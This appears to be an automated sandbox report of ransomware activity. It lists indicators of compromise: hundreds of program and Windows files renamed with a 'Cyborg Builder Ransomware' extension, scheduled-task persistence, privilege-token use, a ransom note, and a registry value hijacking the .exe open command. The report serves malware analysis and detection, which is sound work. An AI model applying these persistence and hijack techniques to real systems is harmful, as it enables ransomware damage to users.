File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\IRIS\PREVIEW.GIF.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_2.2106.2807.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\WindowsApps\Microsoft.GamingApp_2105.900.24.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\Xbox_AppList.scale-125_contrast-black.png.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.40978.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SmallTile.scale-125_contrast-black.png.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\WindowsApps\Microsoft.PowerAutomateDesktop_1.0.65.0_x64__8wekyb3d8bbwe\sr-Latn-RS.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD.HXS.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\WindowsApps\Microsoft.ScreenSketch_11.2104.2.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SnipSketchAppList.targetsize-60.png.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Functions\Assertions\BeLikeExactly.Tests.ps1.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial4-ppd.xrm-ms.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib-amd\components\DocumentCard\DocumentCardTitle.types.js.Cyborg Builder Ransomware wscript.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\eu-es.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest1-pl.xrm-ms.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\VideoLAN\VLC\plugins\codec\libavcodec_plugin.dll.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\WindowsApps\Microsoft.ScreenSketch_11.2104.2.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SnipSketchAppList.targetsize-256.png.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\node_modules\@uifabric\merge-styles\lib-commonjs\IRawStyleBase.js.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\msjet.xsl.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\WindowsApps\Microsoft.BingNews_1.0.6.0_x64__8wekyb3d8bbwe\Assets\AppTiles\NewsAppList.targetsize-32.png.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2104.12721.0_x64__8wekyb3d8bbwe\System.Net.WebSockets.Client.dll.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_1.0.38.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-64_altform-lightunplated.png.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\node_modules\@uifabric\merge-styles\lib\IKeyframes.js.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\Microsoft Office\root\Office16\Bibliography\Author2XML.XSL.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\WindowsApps\Microsoft.Getstarted_10.2.41172.0_neutral_~_8wekyb3d8bbwe.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\EmptySearch-Dark.scale-400.png.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.21012.10511.0_x64__8wekyb3d8bbwe\Assets\contrast-black\OrientationControlMiddleCircleHover.png.Cyborg Builder Ransomware wscript.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\nb-no\ui-strings.js.Cyborg Builder Ransomware wscript.exe File created C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\pwahelper.dll.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\prism_d3d.dll.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\Java\jdk-1.8\bin\javap.exe.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\VideoLAN\VLC\lua\http\view.html.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\HxA-Advanced-Light.scale-200.png.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\Microsoft Office\root\Licenses16\OutlookVL_MAK-ul-phn.xrm-ms.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\Microsoft Office\root\Office16\vccorlib140.dll.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\WindowsApps\Microsoft.BingWeather_1.0.6.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black.Cyborg Builder Ransomware wscript.exe File created C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.143.57\msedgeupdateres_uk.dll.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.6.3102.0_x64__8wekyb3d8bbwe\Win10\MicrosoftSolitaireAppList.targetsize-30_altform-unplated.png.Cyborg Builder Ransomware wscript.exe File created C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Functions\Assertions\PesterThrow.ps1.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\Images\Square44x44Logo.targetsize-36_altform-unplated.png.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\it\System.Windows.Forms.resources.dll.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\Microsoft Office\root\Office16\PerfBoost.exe.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-180.png.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\Microsoft Office\root\Office16\XLSTART.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\HxA-Yahoo-Dark.scale-400.png.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.40831.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-80_contrast-black.png.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\Java\jre-1.8\legal\jdk.Cyborg Builder Ransomware wscript.exe File created C:\Program Files (x86)\Common Files\Microsoft Shared\ink\mshwLatin.dll.Cyborg Builder Ransomware wscript.exe File created C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_US.Cyborg Builder Ransomware wscript.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-sl.Cyborg Builder Ransomware wscript.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Resources\1033\msmdsrv.rll.Cyborg Builder Ransomware wscript.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pt-br\ui-strings.js.Cyborg Builder Ransomware wscript.exe File created C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Microsoft.VisualStudio.Tools.Applications.Runtime.v9.0.dll.Cyborg Builder Ransomware wscript.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File created C:\Windows\WinSxS\wow64_microsoft-windows-audio-callcontrol_31bf3856ad364e35_10.0.22000.376_none_30ba6bbc91270e3c\f\CallButtons.ProxyStub.dll.Cyborg Builder Ransomware wscript.exe File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\Microsoft-Windows-Client-LanguagePack-Package~31bf3856ad364e35~amd64~zh-TW~10.0.22000.493.mum.Cyborg Builder Ransomware wscript.exe File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-l..terprises.resources_31bf3856ad364e35_10.0.22000.493_el-gr_bbb98f1767db1d63.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-security-credssp_31bf3856ad364e35_10.0.22000.318_none_bf30385626ae2dae\credssp.dll.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\r\Public\wsxpacks\Account\assets\__\lib-localization\dist\resources\cs-CZ.json.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\Manifests\amd64_microsoft-windows-i..l-keyboard-00000404_31bf3856ad364e35_10.0.22000.1_none_3eda577b6825da8f.manifest.Cyborg Builder Ransomware wscript.exe File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-ngc-popkeysrv_31bf3856ad364e35_10.0.22000.282_none_cc435a260c3d2b52\f\ngcpopkeysrv.dll.Cyborg Builder Ransomware wscript.exe File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-smbserver-v2_31bf3856ad364e35_10.0.22000.348_none_d54430917bb23076\f.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-rasconnectionmanager_31bf3856ad364e35_10.0.22000.1_none_b563dd17654ea05f\cmstplua.dll.Cyborg Builder Ransomware wscript.exe File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\msil_microsoft.windows.a...commands.resources_31bf3856ad364e35_10.0.22000.348_it-it_0b886f0e11c5ce37.Cyborg Builder Ransomware wscript.exe File created C:\Windows\servicing\Packages\Microsoft-Windows-DirectoryServices-ADAM-Snapins-Admin-Package~31bf3856ad364e35~amd64~~10.0.22000.1.cat.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-embedded-shelllauncher_31bf3856ad364e35_10.0.22000.120_none_3fbde764cc71982b\WESL_ShellLauncher_uninstall.mof.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-m..nt-browser.appxmain_31bf3856ad364e35_10.0.22000.120_none_f759261c81fa2ed8\r.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.318_none_82292a5c4e657627\FileExplorerExtensions\Assets\images\contrast-black\windows.iconsize.details.svg.Cyborg Builder Ransomware wscript.exe File created C:\Windows\assembly\GAC_32\Microsoft.Ink\6.1.0.0__31bf3856ad364e35\Microsoft.Ink.dll.Cyborg Builder Ransomware wscript.exe File created C:\Windows\diagnostics\system\Bluetooth\TS_Main.ps1.Cyborg Builder Ransomware wscript.exe File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..ouppolicy.resources_31bf3856ad364e35_10.0.22000.132_de-de_756c0b2000ab34ff\f.Cyborg Builder Ransomware wscript.exe File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\x86_microsoft-windows-b..ager-pcat.resources_31bf3856ad364e35_10.0.22000.348_lt-lt_34c0164794a89822.manifest.Cyborg Builder Ransomware wscript.exe File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..iagnostic.resources_31bf3856ad364e35_10.0.22000.120_th-th_b16776f8926eb568\f\RS_ChangeProcessorState.psd1.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\amd64_netfx-aspnet_webadmin_providers_b03f5f7f11d50a3a_10.0.22000.1_none_c81c5f94819d7e78\ManageConsolidatedProviders.aspx.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-web-app-host.resources_31bf3856ad364e35_10.0.22000.348_ko-kr_65df44f99c125960\WWAHost.exe.mui.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\x86_microsoft-windows-ie-timeline_31bf3856ad364e35_11.0.22000.1_none_7ae67646211b62e1\Timeline.dll.Cyborg Builder Ransomware wscript.exe File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-l..em-ppipro.resources_31bf3856ad364e35_10.0.22000.493_zh-tw_691e7b2407404874.manifest.Cyborg Builder Ransomware wscript.exe File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\Composition-Core-Package~31bf3856ad364e35~amd64~lv-LV~10.0.22000.184.cat.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-b..buggertransport-usb_31bf3856ad364e35_10.0.22000.1_none_f3c147410f507b43.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\amd64_hyperv-vmemulatednic.resources_31bf3856ad364e35_10.0.22000.1_en-us_69800c7fabcd1071.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-w..owsupdatediagnostic_31bf3856ad364e35_10.0.22000.1_none_d30b4b92822a82a9\cl_windowsupdate.ps1.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\Manifests\amd64_hyperv-compute-gues..teservice.resources_31bf3856ad364e35_10.0.22000.1_en-us_e569506b8fe9ebf7.manifest.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\Manifests\wow64_microsoft-windows-i..-ccshared.resources_31bf3856ad364e35_10.0.22000.1_en-us_bde7d8093b1c0cb9.manifest.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-t..icesframework-msctf_31bf3856ad364e35_10.0.22000.282_none_7b3eae3ca88232d7\msctf.dll.Cyborg Builder Ransomware wscript.exe File created C:\Windows\Boot\Fonts.Cyborg Builder Ransomware wscript.exe File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..rs-keyboard-desktop_31bf3856ad364e35_10.0.22000.71_none_54a6cc49708e2d95.Cyborg Builder Ransomware wscript.exe File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\x86_microsoft-windows-l..me-ppipro.resources_31bf3856ad364e35_10.0.22000.493_zh-cn_5acb849c8a0efcf1\f\license.rtf.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.469_none_fdfb724cd2e5c0ff\inclusive-common.css.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\FileMaps\$$_speech_onecore_engines_85d79caefa9ac893.cdf-ms.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\Manifests\wow64_microsoft-windows-ie-offlinefavorites_31bf3856ad364e35_11.0.22000.1_none_f5b5a5c8f5bd43d7.manifest.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-lcphrase-tbl_31bf3856ad364e35_10.0.22000.1_none_3526bc3a759d37ea.Cyborg Builder Ransomware wscript.exe File created C:\Windows\servicing\Packages\HyperV-Compute-Storage-merged-Package~31bf3856ad364e35~amd64~en-US~10.0.22000.1.mum.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SystemApps\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\Assets\Logo.scale-100.png.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.176_none_fded9bd0d2f09976\appObjectFactory.js.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.318_none_82292a5c4e657627\FileExplorerExtensions\Assets\images\contrast-white\NoDetailsOrPreview.svg.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\amd64_winusb.inf.resources_31bf3856ad364e35_10.0.22000.1_en-us_55bcfd207a63126d.Cyborg Builder Ransomware wscript.exe File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-n..s-package.resources_31bf3856ad364e35_10.0.22000.120_uk-ua_c197e01452d7b8e1\f\LocalizationData.psd1.Cyborg Builder Ransomware wscript.exe File created C:\Windows\servicing\Packages\HyperV-HvSocket-Package~31bf3856ad364e35~amd64~en-US~10.0.22000.1.mum.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-dafaspinfraprovider_31bf3856ad364e35_10.0.22000.1_none_057e048ea6323b5c.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-g..tallation.resources_31bf3856ad364e35_10.0.22000.1_en-us_f671ae4b278d3a1e\appmgmts.dll.mui.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-scripting-chakra_31bf3856ad364e35_11.0.22000.318_none_028e8a48890a0434.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\Manifests\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.22000.1_es-mx_3f28231c958e225b.manifest.Cyborg Builder Ransomware wscript.exe File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..ouppolicy.resources_31bf3856ad364e35_10.0.22000.132_it-it_ab07aa42b9b42e49\f\CloudContent.adml.Cyborg Builder Ransomware wscript.exe File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-web-app-host.resources_31bf3856ad364e35_10.0.22000.348_es-mx_95a76a97eb16683a\f\WWAHost.exe.mui.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-f..back-courtesyengine_31bf3856ad364e35_10.0.22000.282_none_74f07f6d49ae70dd\f.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.318_none_82292a5c4e657627\r\Public\wsxpacks\Account\assets\__\lib-localization\dist\resources\kn-IN.json.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\amd64_microsoft.windows.powershell.v3.wsman_31bf3856ad364e35_10.0.22000.1_none_50e44306802cb22a\Microsoft.WSMan.Management.psd1.Cyborg Builder Ransomware wscript.exe File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\Microsoft-Windows-Server-AppCompat-FoD-Package~31bf3856ad364e35~amd64~gl-ES~10.0.22000.282.mum.Cyborg Builder Ransomware wscript.exe File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\Microsoft-Windows-UserDeviceRegistration-Package~31bf3856ad364e35~amd64~ar-SA~10.0.22000.258.cat.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.469_none_fdfb724cd2e5c0ff\ssprerror-main.html.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-wmiv2provider_31bf3856ad364e35_10.0.22000.1_none_7d961686cedc995c\Test-NetConnection.psm1.Cyborg Builder Ransomware wscript.exe File created C:\Windows\servicing\Packages\Microsoft-Windows-WindowsMediaPlayer-Troubleshooters-Package~31bf3856ad364e35~amd64~en-US~10.0.22000.1.mum.Cyborg Builder Ransomware wscript.exe File created C:\Windows\SystemApps\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\Assets\StoreLogo.contrast-white_scale-100.png.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.318_none_82292a5c4e657627\FileExplorerExtensions\Assets\images\contrast-white\windows.showdesktop.svg.Cyborg Builder Ransomware wscript.exe File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-lockapp.appxmain_31bf3856ad364e35_10.0.22000.348_none_e2c7a9ab59285812.Cyborg Builder Ransomware wscript.exe File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..component.resources_31bf3856ad364e35_10.0.22000.120_et-ee_766bb08343013170\f.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\amd64_startupapp-task-data_31bf3856ad364e35_10.0.22000.1_none_9acb42b11a41d6f0.Cyborg Builder Ransomware wscript.exe File created C:\Windows\WinSxS\amd64_netfx4-mscorpe_dll_b03f5f7f11d50a3a_4.0.15806.0_none_8a5f7fe0cdd16f1a.Cyborg Builder Ransomware wscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 3284 5040 WerFault.exe 3832 1304 WerFault.exe 6740 6708 WerFault.exe 248 -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4696 schtasks.exe 6896 schtasks.exe 6696 schtasks.exe 6612 schtasks.exe -
Kills process with taskkill 1 IoCs
pid Process 7036 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\Local Settings bot.exe Key created \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\Local Settings RIP_YOUR_PC_LOL.exe Key created \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\Local Settings TEMPSP~1.EXE Key created \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\Local Settings 5.exe Key created \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\Local Settings [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" bot.exe Key created \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\Local Settings TEMPEX~1.EXE Key created \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\Local Settings 4363463463464363463463463.exe Key created \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\Local Settings 6.exe Key created \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\Local Settings msedge.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 6480 reg.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 3864 NOTEPAD.EXE -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 996 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2564 [email protected] 2564 [email protected] 2564 [email protected] 2564 [email protected] 4528 netsh.exe 4528 netsh.exe 1456 6.exe 1456 6.exe 6208 as.exe 6208 as.exe 6208 as.exe 6208 as.exe 1456 6.exe 1456 6.exe 4792 bot.exe 4792 bot.exe 4792 bot.exe 4792 bot.exe 4792 bot.exe 4792 bot.exe 4792 bot.exe 4792 bot.exe 4792 bot.exe 4792 bot.exe 4792 bot.exe 4792 bot.exe 4792 bot.exe 4792 bot.exe 4792 bot.exe 4792 bot.exe 4792 bot.exe 4792 bot.exe 4792 bot.exe 4792 bot.exe 4792 bot.exe 4792 bot.exe 4792 bot.exe 4792 bot.exe 4792 bot.exe 4792 bot.exe 5280 bot.exe 5280 bot.exe 5872 vbc.exe 5872 vbc.exe 1492 7.exe 1492 7.exe 6156 alex.exe 6592 system.exe 6592 system.exe 6592 system.exe 6592 system.exe 6592 system.exe 6592 system.exe 6592 system.exe 6592 system.exe 6592 system.exe 6592 system.exe 6592 system.exe 6592 system.exe 6592 system.exe 6592 system.exe 6592 system.exe 6592 system.exe 6592 system.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5116 4363463463464363463463463.exe Token: SeShutdownPrivilege 764 [email protected] Token: SeCreatePagefilePrivilege 764 [email protected] Token: SeDebugPrivilege 1456 6.exe Token: SeDebugPrivilege 6208 as.exe Token: SeBackupPrivilege 4628 vssvc.exe Token: SeRestorePrivilege 4628 vssvc.exe Token: SeAuditPrivilege 4628 vssvc.exe Token: SeDebugPrivilege 1492 7.exe Token: SeDebugPrivilege 4792 bot.exe Token: SeDebugPrivilege 5280 bot.exe Token: SeDebugPrivilege 6592 system.exe Token: 33 6592 system.exe Token: SeIncBasePriorityPrivilege 6592 system.exe Token: SeIncreaseQuotaPrivilege 7084 wmic.exe Token: SeSecurityPrivilege 7084 wmic.exe Token: SeTakeOwnershipPrivilege 7084 wmic.exe Token: SeLoadDriverPrivilege 7084 wmic.exe Token: SeSystemProfilePrivilege 7084 wmic.exe Token: SeSystemtimePrivilege 7084 wmic.exe Token: SeProfSingleProcessPrivilege 7084 wmic.exe Token: SeIncBasePriorityPrivilege 7084 wmic.exe Token: SeCreatePagefilePrivilege 7084 wmic.exe Token: SeBackupPrivilege 7084 wmic.exe Token: SeRestorePrivilege 7084 wmic.exe Token: SeShutdownPrivilege 7084 wmic.exe Token: SeDebugPrivilege 7084 wmic.exe Token: SeSystemEnvironmentPrivilege 7084 wmic.exe Token: SeRemoteShutdownPrivilege 7084 wmic.exe Token: SeUndockPrivilege 7084 wmic.exe Token: SeManageVolumePrivilege 7084 wmic.exe Token: 33 7084 wmic.exe Token: 34 7084 wmic.exe Token: 35 7084 wmic.exe Token: 36 7084 wmic.exe Token: SeIncreaseQuotaPrivilege 7084 wmic.exe Token: SeSecurityPrivilege 7084 wmic.exe Token: SeTakeOwnershipPrivilege 7084 wmic.exe Token: SeLoadDriverPrivilege 7084 wmic.exe Token: SeSystemProfilePrivilege 7084 wmic.exe Token: SeSystemtimePrivilege 7084 wmic.exe Token: SeProfSingleProcessPrivilege 7084 wmic.exe Token: SeIncBasePriorityPrivilege 7084 wmic.exe Token: SeCreatePagefilePrivilege 7084 wmic.exe Token: SeBackupPrivilege 7084 wmic.exe Token: SeRestorePrivilege 7084 wmic.exe Token: SeShutdownPrivilege 7084 wmic.exe Token: SeDebugPrivilege 7084 wmic.exe Token: SeSystemEnvironmentPrivilege 7084 wmic.exe Token: SeRemoteShutdownPrivilege 7084 wmic.exe Token: SeUndockPrivilege 7084 wmic.exe Token: SeManageVolumePrivilege 7084 wmic.exe Token: 33 7084 wmic.exe Token: 34 7084 wmic.exe Token: 35 7084 wmic.exe Token: 36 7084 wmic.exe Token: 33 6036 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 6036 AUDIODG.EXE Token: 33 6592 system.exe Token: SeIncBasePriorityPrivilege 6592 system.exe Token: 33 6592 system.exe Token: SeIncBasePriorityPrivilege 6592 system.exe Token: SeIncreaseQuotaPrivilege 5168 WMIC.exe Token: SeSecurityPrivilege 5168 WMIC.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2696 tuc2.tmp -
Suspicious use of SetWindowsHookEx 23 IoCs
pid Process 6516 @[email protected] 6516 @[email protected] 6100 @[email protected] 6100 @[email protected] 5804 @[email protected] 5804 @[email protected] 1968 @[email protected] 5132 @[email protected] 3628 @[email protected] 708 @[email protected] 5428 @[email protected] 6168 @[email protected] 4796 @[email protected] 5228 @[email protected] 3276 @[email protected] 5504 @[email protected] 6820 @[email protected] 3628 @[email protected] 5544 @[email protected] 6852 @[email protected] 7072 @[email protected] 2912 @[email protected] 428 @[email protected] -
Suspicious use of WriteProcessMemory 64 IoCs
